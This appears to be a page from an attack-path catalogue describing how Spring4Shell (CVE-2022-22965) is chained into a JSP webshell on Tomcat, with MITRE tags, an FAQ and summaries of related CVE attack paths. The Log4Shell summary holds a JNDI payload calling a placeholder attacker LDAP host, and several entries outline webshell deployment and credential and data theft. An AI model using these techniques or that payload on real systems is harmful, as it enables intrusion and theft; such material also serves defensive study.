Spring4Shell (CVE-2022-22965) → JSP webshell on Tomcat

§ Context

Assumed environment: target runs Spring MVC + Apache Tomcat. Spring framework < 5.3.18 / 5.2.20. JDK 9+ (the binding chain that reaches PropertyDescriptor is JDK-9+ only).

§ Steps

1. 01
   Request webshell from /shell.jspExecution

   T1059— Command and Scripting Interpreter
2. 02
   Recover service creds from app config / envCredential Access

   T1552— Unsecured Credentials
3. 03
   Identify Spring + TomcatReconnaissance

   W-RECON-FINGERPRINT— Tech Stack Fingerprinting
4. 04
   Trigger log line containing JSP webshellPersistence

   W-WEBSHELL— Webshell Deployment
5. 05
   Rewrite Tomcat AccessLogValve via SpringExecution

   CVE-SPRING4SHELL— Spring4Shell (CVE-2022-22965)
6. 06
   Confirm binding reaches class.module.classLoaderExecution

   CVE-SPRING4SHELL— Spring4Shell (CVE-2022-22965)

§ References

• T1059Command and Scripting Interpreter
• T1552Unsecured Credentials

§ Frequently asked

What is the "Spring4Shell (CVE-2022-22965) → JSP webshell on Tomcat" attack path?

Send a crafted POST that uses Spring's data-binding to mutate Tomcat's logging configuration — turn its access log into a JSP file written under webapps/, then request it. It chains 6 steps drawn from real-world offensive-security techniques.

What starting position does this attack require?

The first step is Request webshell from /shell.jsp (T1059) — a execution primitive. Assumed environment: target runs Spring MVC + Apache Tomcat.

What is the final impact of this kill-chain?

The final step lands on Confirm binding reaches class.module.classLoader (CVE-SPRING4SHELL), which falls under Execution. From here, an operator typically pivots into post-exploitation or maintains persistence.

How can defenders detect or prevent this attack?

Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.

§ Related dossiers

• Shared techniques3

  F5 BIG-IP iControl auth bypass (CVE-2022-1388) → root on LB

  Connection-header smuggle bypasses iControl REST auth, command-injection RCE as root. Load balancers see all traffic — recover TLS keys, session cookies, internal SSO config.

• Shared techniques3

  Apache Struts S2-045 (CVE-2017-5638) → Equifax-style breach

  Crafted Content-Type header is parsed as OGNL — execute commands as the app user. The 2017 Equifax breach origin: unpatched Struts endpoint exposed to the internet.

• Shared techniques3

  FortiGate SSL-VPN pre-auth RCE → config theft

  Pre-auth heap overflow / format-string against FortiGate sslvpnd grants root on the appliance. Pull the running config, decrypt stored RADIUS / LDAP / VPN-user secrets.

• Shared techniques2

  MOVEit Transfer (CVE-2023-34362) → mass data exfil (Cl0p)

  Pre-auth SQLi in MOVEit's web UI forges an admin session. .NET deserialisation chain drops a webshell as SYSTEM. Cl0p's 2023 mass-exfil playbook: download every file under /var/files.

• Shared techniques2

  Log4Shell (CVE-2021-44228) → RCE → lateral

  Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.

• Shared techniques2

  Unpatched Confluence (CVE-2023-22515) → internal foothold

  Internal Confluence instance reachable from the corporate VLAN. Trivial privilege-escalation CVE creates an admin user; webshell uploaded; pivot into AD service accounts.